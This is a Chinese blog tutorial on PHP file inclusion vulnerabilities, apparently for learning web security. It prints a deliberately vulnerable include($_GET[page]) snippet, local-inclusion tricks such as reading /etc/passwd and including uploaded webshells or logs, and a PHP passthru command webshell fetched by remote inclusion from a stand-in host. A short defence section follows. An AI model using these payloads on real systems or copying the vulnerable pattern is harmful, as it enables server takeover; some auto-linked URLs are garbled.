<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="Web安全之文件包含漏洞"><meta name="keywords" content="Web安全"><meta name="author" content="Alston"><meta name="copyright" content="Alston"><title>Web安全之文件包含漏洞 | Alston's blog</title><link rel="shortcut icon" href="/1231489.png"><link rel="stylesheet" href="/css/index.css?version=1.7.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.7.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://v1.hitokoto.cn/?encode=js&amp;charset=utf-8&amp;select=.footer_custom_text" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  }
} </script><meta name="generator" content="Hexo 4.2.0"></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1-文件包含漏洞成因"><span class="toc-text"> 1 文件包含漏洞成因</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2-为什么要包含文件"><span class="toc-text"> 2 为什么要包含文件？</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3-如何利用这个漏洞"><span class="toc-text"> 3 如何利用这个漏洞？</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#31-本地包含lfi"><span class="toc-text"> 3.1 本地包含(LFI)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#32-远程包含rfi"><span class="toc-text"> 3.2 远程包含(RFI)</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#4-文件包含漏洞的防御"><span class="toc-text"> 4 文件包含漏洞的防御</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#5-附录"><span class="toc-text"> 5 附录</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://pic4.zhimg.com/80/v2-1b0d0240350e3d8e0550845b6bdaad1e_hd.jpg"></div><div class="author-info__name text-center">Alston</div><div class="author-info__description text-center">计算机硕士在读</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">50</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">27</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">13</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" href="https://blog.csdn.net/Sc0fie1d" target="_blank" rel="noopener">Alston's CSDN</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://s3.ax1x.com/2021/03/14/60DEdJ.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Alston's blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">Web安全之文件包含漏洞</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-02-21</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Web%E5%AE%89%E5%85%A8/">Web安全</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">2.3k</span><span class="post-meta__separator">|</span><span>阅读时长: 7 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="1-文件包含漏洞成因"><a class="markdownIt-Anchor" href="#1-文件包含漏洞成因"></a> 1 文件包含漏洞成因</h1>
<p>文件包含漏洞是代码注入的一种。其原理就是注入一段用户能控制的脚本或代码，并让服务器端执行，代码注入的典型代表就是文件包含File inclusion。文件包含可能会出现在jsp、php、asp等语言中。服务器通过函数去包含任意文件时，由于要包含的这个文件来源过滤不严，从而可以去包含一个恶意文件，而我们可以构造这个恶意文件来达到邪恶的目的。常见的文件包含的函数如下：</p>
<p><kbd>PHP</kbd>：|<code>include() 、include_once()、require()、require_once()、fopen()、readfile()</code><br />
<kbd>JSP/Servlet</kbd>：|<code>&lt;/kbd&gt;ava.io.file()、java.io.filereader()</code>|<br />
<kbd>ASP</kbd>：|<code>include file、include virtual</code>|</p>
<ul>
<li>
<p><kbd>Include</kbd>：包含并运行指定文件，当包含外部文件发生错误时，系统给出警告，但整个php文件继续执行。</p>
</li>
<li>
<p><kbd>Require</kbd>：跟include唯一不同的是，当产生错误时候，include会继续运行而require停止运行</p>
</li>
<li>
<p><kbd>Include_once</kbd>：这个函数跟include函数作用几乎相同，只是他在导入函数之前先检测下该文件是否被导入。如果已经执行一遍那么就不重复执行了。</p>
</li>
<li>
<p><kbd>Require_once</kbd>：这个函数跟require函数作用几乎相同，与include_once和include类似</p>
</li>
<li>
<p><kbd>php.ini配置文件</kbd>：allow_url_fopen=off 即不可以包含远程文件。php4存在远程包含&amp;本地包含，php5仅存在本地包含。</p>
</li>
</ul>
<p>使用上面几个函数包含文件时，该文件将作为PHP代码执行，PHP内核并不在意被包含的文件是什么类型的。也就是说我们用这几个函数包含.jpg文件时，也会将其当做php文件来执行。</p>
<h1 id="2-为什么要包含文件"><a class="markdownIt-Anchor" href="#2-为什么要包含文件"></a> 2 为什么要包含文件？</h1>
<p>程序员写程序的时候，不喜欢干同样的事情，也不喜欢把同样的代码（比如一些公用的函数）写几次，于是就把需要公用的代码写在一个单独的文件里面，比如 share.php，而后在其它文件需要使用时进行包含调用。在php里，我们就是使用上面列举的那几个函数来达到这个目的的，它的工作流程：如果你想在 main.php里包含share.php,我将这样写 include(“share.php”) ，然后就可以使用share.php中的函数了，像这个写死需要包含的文件名称的自然没有什么问题，也不会出现漏洞，那么问题到底是出在哪里呢？</p>
<p>有的时候可能并不能确定需要包含哪个文件，比如看下面的代码：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> ($_GET[page]) &#123;</span><br><span class="line">    <span class="keyword">include</span> $_GET[page];</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">include</span> <span class="string">"home.php"</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>上面这段代码的使用格式可能是这样的：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http:&#x2F;&#x2F;hi.baidu.com&#x2F;m4r10&#x2F;php&#x2F;index.php?page&#x3D;main.php</span><br></pre></td></tr></table></figure>
<p><strong>1、提交上面这个URL，在index.php中就取得这个page的值（$_GET[page]）。</strong></p>
<p><strong>2、判断$_GET[page]是不是空，若不空（这里是main.php）就用include来包含这个文件。</strong></p>
<p><strong>3、 若$_GET[page]空的话就执行else，来 include &quot;home.php&quot;这个文件。</strong></p>
<p>你也许要说，这样很好呀，可以按照URL来动态包含文件，多么方便呀，怎么产生漏洞的呢？问题的答案是：我们不乖巧，我们总喜欢和别人不一样，我们不会按照他的链接来操作，我们可能想自己写想包含（调用）的文件。比如下面说的！</p>
<h1 id="3-如何利用这个漏洞"><a class="markdownIt-Anchor" href="#3-如何利用这个漏洞"></a> 3 如何利用这个漏洞？</h1>
<h2 id="31-本地包含lfi"><a class="markdownIt-Anchor" href="#31-本地包含lfi"></a> 3.1 本地包含(LFI)</h2>
<ul>
<li>本地包含条件：</li>
</ul>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">1、allow_url_fopen&#x3D;On </span><br><span class="line"></span><br><span class="line">2、用户可以动态控制变量</span><br></pre></td></tr></table></figure>
<p>针对以上代码，比如我们会随便的写入下面这个URL：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http: &#x2F;&#x2F;hi.baidu.com&#x2F;m4r10&#x2F;php&#x2F;index.php?page&#x3D;hello.php。</span><br></pre></td></tr></table></figure>
<p>然后我们的index.php程序就傻傻按照上面我们说得步骤去执行：取page为hello.php，然后去include(hello.php)。这时问题出现了，因为我们并没有hello.php这个文件，所以它 include的时候就会报警告，类似下列信息：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Quote:</span><br><span class="line">Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in &#x2F;vhost&#x2F;wwwroot&#x2F;php&#x2F;index.phpon line 3</span><br><span class="line">Warning: include() [function.include]: Failed opening hello.php for inclusion (include_path&#x3D;.:) in &#x2F;vhost&#x2F;wwwroot&#x2F;php&#x2F;index.php on line 3</span><br></pre></td></tr></table></figure>
<p>第一行的那个Warning就是找不到我们指定的hello.php文件，也就是包含不到我们指定路径的文件；</p>
<p>而第二行的警告是因为前面没有找到指定文件，所以包含的时候就出警告了。</p>
<p>通过报错，我们可以得知绝对路径 /vhost/wwwroot/php/</p>
<p>我们可以多次探测来包含其他文件，比如指定 <a href="http://www.xxx.com/index.php?test=./123.txt%EF%BC%8C%E6%9D%A5%E8%AF%BB%E5%87%BA%E5%BD%93%E5%89%8D%E8%B7%AF%E5%BE%84%E4%B8%8B%E7%9A%84123.txt%EF%BC%8C%E4%B9%9F%E5%8F%AF%E4%BB%A5%E4%BD%BF%E7%94%A8../%E6%9D%A5%E8%BF%9B%E8%A1%8C%E7%9B%AE%E5%BD%95%E8%B7%B3%E8%BD%AC%EF%BC%88%E5%9C%A8%E6%B2%A1%E8%BF%87%E6%BB%A4../%E7%9A%84%E6%83%85%E5%86%B5%E4%B8%8B%EF%BC%89%EF%BC%8C%E4%B9%9F%E5%8F%AF%E4%BB%A5%E7%9B%B4%E6%8E%A5%E6%8C%87%E5%AE%9A%E7%BB%9D%E5%AF%B9%E8%B7%AF%E5%BE%84%EF%BC%8C%E8%AF%BB%E5%8F%96%E6%95%8F%E6%84%9F%E7%9A%84%E7%B3%BB%E7%BB%9F%E6%96%87%E4%BB%B6" target="_blank" rel="noopener">www.xxx.com/index.php?test=./123.txt，来读出当前路径下的123.txt，也可以使用../来进行目录跳转（在没过滤../的情况下），也可以直接指定绝对路径，读取敏感的系统文件</a> ，比如 <a href="http://www.xxx.com/index.php?test=/etc/passwd,%E5%A6%82%E6%9E%9C%E7%9B%AE%E6%A0%87%E4%B8%BB%E6%9C%BA%E6%B2%A1%E6%9C%89%E5%AF%B9%E6%9D%83%E9%99%90%E9%99%90%E5%88%B6%E7%9A%84%E5%BE%88%E4%B8%A5%E6%A0%BC%EF%BC%8C%E6%88%96%E8%80%85%E5%90%AF%E5%8A%A8Apache%E7%9A%84%E6%9D%83%E9%99%90%E6%AF%94%E8%BE%83%E9%AB%98%EF%BC%8C%E6%98%AF%E5%8F%AF%E4%BB%A5%E8%AF%BB%E5%87%BA%E8%BF%99%E4%B8%AA%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9%E7%9A%84%E3%80%82%E5%90%A6%E5%88%99%E5%B0%B1%E4%BC%9A%E5%BE%97%E5%88%B0%E4%B8%80%E4%B8%AA%E7%B1%BB%E4%BC%BC%E4%BA%8E%EF%BC%9Aopen_basedir" target="_blank" rel="noopener">www.xxx.com/index.php?test=/etc/passwd,如果目标主机没有对权限限制的很严格，或者启动Apache的权限比较高，是可以读出这个文件内容的。否则就会得到一个类似于：open_basedir</a> restriction in effect. 的 Warning。</p>
<p>如果我们可以上传文件的话，我们可以上传一句话木马，然后再包含一句话木马，再用菜刀连接拿下网站的Webshell</p>
<ul>
<li>本地文件包含漏洞利用技巧：</li>
</ul>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">1、包含用户上传的文件 (我们上传的一句话木马等等)</span><br><span class="line"></span><br><span class="line">2、包含data:&#x2F;&#x2F; 或 php:&#x2F;&#x2F;input 等伪协议</span><br><span class="line"></span><br><span class="line">3、包含 Session 文件</span><br><span class="line"></span><br><span class="line">4、包含日志文件（通过构造语句让服务器报错并将一句话随报错信息写入日志；找到日志文件路径，包含此文件；用菜刀连接；拿下网站的Webshell ）</span><br></pre></td></tr></table></figure>
<h2 id="32-远程包含rfi"><a class="markdownIt-Anchor" href="#32-远程包含rfi"></a> 3.2 远程包含(RFI)</h2>
<ul>
<li>远程包含条件：</li>
</ul>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">1、allow_url_include&#x3D;On</span><br><span class="line"></span><br><span class="line">2、用户可以动态控制变量</span><br></pre></td></tr></table></figure>
<p>我们可以指定其他URL上的一个我们写的一句话木马，然后用菜刀连接获取Webshell。</p>
<p>我们还可以指定其它URL上的一个包含PHP代码的webshell来直接运行，比如，我先写一段运行命令的PHP代码，如下保存为cmd.txt（后缀不重要，只要内容为PHP格式就可以了）。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (get_magic_quotes_gpc())</span><br><span class="line">&#123;$_REQUEST[<span class="string">"cmd"</span>]=stripslashes($_REQUEST[<span class="string">"cmd"</span>]);&#125;　<span class="comment">//去掉转义字符（可去掉字符串中的反斜线字符）</span></span><br><span class="line">ini_set(<span class="string">"max_execution_time"</span>,<span class="number">0</span>);　<span class="comment">//设定针对这个文件的执行时间，0为不限制.</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"开始行"</span>;　　　　　　 <span class="comment">//打印的返回的开始行提示信息</span></span><br><span class="line">passthru($_REQUEST[<span class="string">"cmd"</span>]);　　　<span class="comment">//运行cmd指定的命令</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"结束行"</span>;　　　　　　 <span class="comment">//打印的返回的结束行提示信息</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>以上这个文件的作用就是接受cmd指定的命令，并调用passthru函数执行，把内容返回在开始行与结束行之间。把这个文件保存到我们主机的服务器上（可以是不支持PHP的主机），只要能通过HTTP访问到就可以了，例如地址如下：<a href="http://www.xxx.cn/cmd.txt%EF%BC%8C%E7%84%B6%E5%90%8E%E6%88%91%E4%BB%AC%E5%B0%B1%E5%8F%AF%E4%BB%A5%E5%9C%A8%E9%82%A3%E4%B8%AA%E6%BC%8F%E6%B4%9E%E4%B8%BB%E6%9C%BA%E4%B8%8A%E6%9E%84%E9%80%A0%E5%A6%82%E4%B8%8BURL%E6%9D%A5%E5%88%A9%E7%94%A8%E4%BA%86%EF%BC%9A" target="_blank" rel="noopener">http://www.xxx.cn/cmd.txt，然后我们就可以在那个漏洞主机上构造如下URL来利用了：</a></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http:&#x2F;&#x2F;hi.baidu.com&#x2F;m4r10&#x2F;php&#x2F;index.php?page&#x3D;http: &#x2F;&#x2F;www.xxx.cn&#x2F;cmd.txt?cmd&#x3D;ls</span><br></pre></td></tr></table></figure>
<p>其中cmd后面的就是你需要执行的命令，其它常用的命令（以*UNIX为例）如下：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">1、ll 列目录、文件（相当于Windows下dir)</span><br><span class="line"></span><br><span class="line">2、pwd 查看当前绝对路径</span><br><span class="line"></span><br><span class="line">3、whoami 查看当前用户</span><br><span class="line"></span><br><span class="line">4、wget　下载指定URL的文件</span><br></pre></td></tr></table></figure>
<h1 id="4-文件包含漏洞的防御"><a class="markdownIt-Anchor" href="#4-文件包含漏洞的防御"></a> 4 文件包含漏洞的防御</h1>
<p>在php中，文件包含需要配置allow_url_include=On(远程文件包含)、allow_url_fopen=On(本地文件包含) 。所以，我们可以将其关闭，这样就可以杜绝文件包含漏洞了。但是，某些情况下，不能将其关闭，必须进行包含的话，我们可以使用白名单过滤的方法，只能包含我们指定的文件。这样，就可以杜绝文件包含漏洞了。</p>
<h1 id="5-附录"><a class="markdownIt-Anchor" href="#5-附录"></a> 5 附录</h1>
<p>1、DVWA-File Include：<a href="https://www.freebuf.com/articles/web/119150.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/119150.html</a><br />
2、关于编码</p>
<ul>
<li>正常流程：</li>
</ul>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">浏览器将URL不支持的字符进行URL十六进制编码，传送给服务器;</span><br><span class="line"></span><br><span class="line">服务器解码后交给后端php处理；</span><br><span class="line"></span><br><span class="line">后端处理完后将编码的URL返回给浏览器，由浏览器解码。</span><br></pre></td></tr></table></figure>
<ul>
<li>对于a-z A-Z这样的字符，浏览器在发送请求前会做解码；而对于URL不支持的字符，比如%20，浏览器是不做解码的，真正的解码是在服务器上（apache/nginx）做的，服务器解码完成之后传送给php进行过滤.</li>
<li>如果在浏览器对URL进行二次编码，发送到后端之后，服务器进行一次解码后交给php；虽然可以绕过php过滤，但是返回给浏览器对仍然是二次编码，而浏览器只能进行一次解码，仍无法正常执行。</li>
<li>同理，如果在浏览器对URL进行base64编码，同样可以绕过过滤；但是浏览器无法解码base64</li>
</ul>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Alston</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://lizitong67.github.io/2020/02/21/Web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/">https://lizitong67.github.io/2020/02/21/Web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://lizitong67.github.io">Alston's blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Web%E5%AE%89%E5%85%A8/">Web安全</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/02/21/Web%E5%AE%89%E5%85%A8%E4%B9%8B%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/"><i class="fa fa-chevron-left">  </i><span>Web安全之文件上传漏洞</span></a></div><div class="next-post pull-right"><a href="/2020/02/21/XSS-Labs%E6%8C%91%E6%88%98%E7%AC%94%E8%AE%B0Level11-20/"><span>XSS-Labs挑战笔记Level11-20</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://s3.ax1x.com/2021/03/14/60DEdJ.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2020 - 2021 By Alston</div><div class="framework-info"><span>驱动 - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div><div class="footer_custom_text">hitokoto</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.7.0"></script><script src="/js/fancybox.js?version=1.7.0"></script><script src="/js/sidebar.js?version=1.7.0"></script><script src="/js/copy.js?version=1.7.0"></script><script src="/js/fireworks.js?version=1.7.0"></script><script src="/js/transition.js?version=1.7.0"></script><script src="/js/scroll.js?version=1.7.0"></script><script src="/js/head.js?version=1.7.0"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex@latest/dist/katex.min.css"><script src="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.css"><script src="/js/katex.js"></script><script src="/js/search/local-search.js"></script><script id="ribbon" src="/js/third-party/canvas-ribbon.js" size="150" alpha="0.6" zIndex="-1" data-click="false"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a href="https://github.com/wzpan/hexo-generator-search" target="_blank" rel="noopener" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>